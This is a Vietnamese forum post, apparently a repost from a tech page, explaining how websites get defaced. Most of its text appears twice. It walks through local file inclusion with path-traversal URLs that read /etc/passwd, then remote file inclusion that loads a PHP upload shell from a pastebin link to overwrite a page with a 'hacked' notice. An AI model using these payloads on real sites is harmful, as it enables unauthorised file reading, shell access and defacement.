mahuy.tu91
Member
Đa số mọi người đều đã từng thấy 1 trang web bị hack và thay đổi giao diện là anonymous, haked by abc….. Vậy làm thế nào các hacker có thể làm được điều đó?
Cho tới hiện tại thì có 3 cách phổ biến:
Lỗ hổng File Inclusion cho phép tin tặc truy cập trái phép vào những tập tin nhạy cảm trên máy chủ web hoặc thực thi các tệp độc hại bằng cách sử dụng chức năng “include”. Lỗ hổng này xảy ra do cơ chế kiểm tra đầu vào không được thực hiện tốt, khiến tin tặc có thể khai thác và chèn các dữ liệu độc hại.
Video hack website bằng upload file độc hại lên server
Bắt đầu thôi!
Ví dụ ta có site này
Giải thích như sau: trang PHP kia sẽ đọc file từ photos.php mà biến page đã được gán. Lúc này nếu sơ hở không lọc kỹ càng, các hacker sẽ lợi dụng lỗ hổng này để khai thác và đoc nhiều file nhạy cảm hơn password.
Đến đây ta thử thành đường dẫn google
Tada, hiên ra nguyên trang search google
Vậy là index.php không lọc input đầu vào, ta có thể đọc được file password không? Ban đầu mình thử etc/passwd
Kết quả khoog show ra gì. Tiếp tục sử dụng kĩ thuật path lên 1 thư mục bằng ../
Vẫn không hiện, tiếp tục path
Cuối cùng, nguyên passwd đã lộ ra sau 2 lần thử
Chưa dừng lại ở đây. Nếu có thể đọc được bất kỳ file nào. Sao ta không thử đọc 1 file với mục đích upload file lên server. Chuẩn bị 1 file uploadShell.php. Copy code vào pastebin nhằm mục đích lấy link. Sau một hồi ta được 1 link với code php để upload file, được kết quả như sau:
Giờ chỉ cần tới công đoạn up file bất kỳ nào lên thôi tùy mục đích của hacker. Trong video mình muốn ghi đè file dispo_call.php nên mình đã tạo 1 file php y chang nhưng source code là trang web giao diện thông báo trang web này đã bị hack. Cuối cùng thành công, hoàn thành thử thách.
Mình đã trình bày xong 1 series hack trang web như thế nào. Nếu bạn thích những bài như thế này thì đón chờ ở tập 2 của seri này nha.
TechTalk via J2Team
Cho tới hiện tại thì có 3 cách phổ biến:
- Reomote File Include (RFI)
- SQL injection
- Cross-site Scripting
Lỗ hổng File Inclusion cho phép tin tặc truy cập trái phép vào những tập tin nhạy cảm trên máy chủ web hoặc thực thi các tệp độc hại bằng cách sử dụng chức năng “include”. Lỗ hổng này xảy ra do cơ chế kiểm tra đầu vào không được thực hiện tốt, khiến tin tặc có thể khai thác và chèn các dữ liệu độc hại.
Bắt đầu thôi!
Ví dụ ta có site này
1 2 3 | abc. com/index.php?page=photos.php |
Đến đây ta thử thành đường dẫn google
1 2 3 | abc. com/index.php?page=http:// google.com |
Tada, hiên ra nguyên trang search google

Vậy là index.php không lọc input đầu vào, ta có thể đọc được file password không? Ban đầu mình thử etc/passwd
1 2 3 | abc. com/index.php?page=etc/passwd |
1 2 3 | abc. com/index.php?page=../etc/passwd |
1 2 3 | abc. com/index.php?page=../../etc/passwd |

Chưa dừng lại ở đây. Nếu có thể đọc được bất kỳ file nào. Sao ta không thử đọc 1 file với mục đích upload file lên server. Chuẩn bị 1 file uploadShell.php. Copy code vào pastebin nhằm mục đích lấy link. Sau một hồi ta được 1 link với code php để upload file, được kết quả như sau:
1 2 3 | abc. com/index.php?page=https:// pastebin. com/xyz |

Mình đã trình bày xong 1 series hack trang web như thế nào. Nếu bạn thích những bài như thế này thì đón chờ ở tập 2 của seri này nha.
TechTalk via J2Team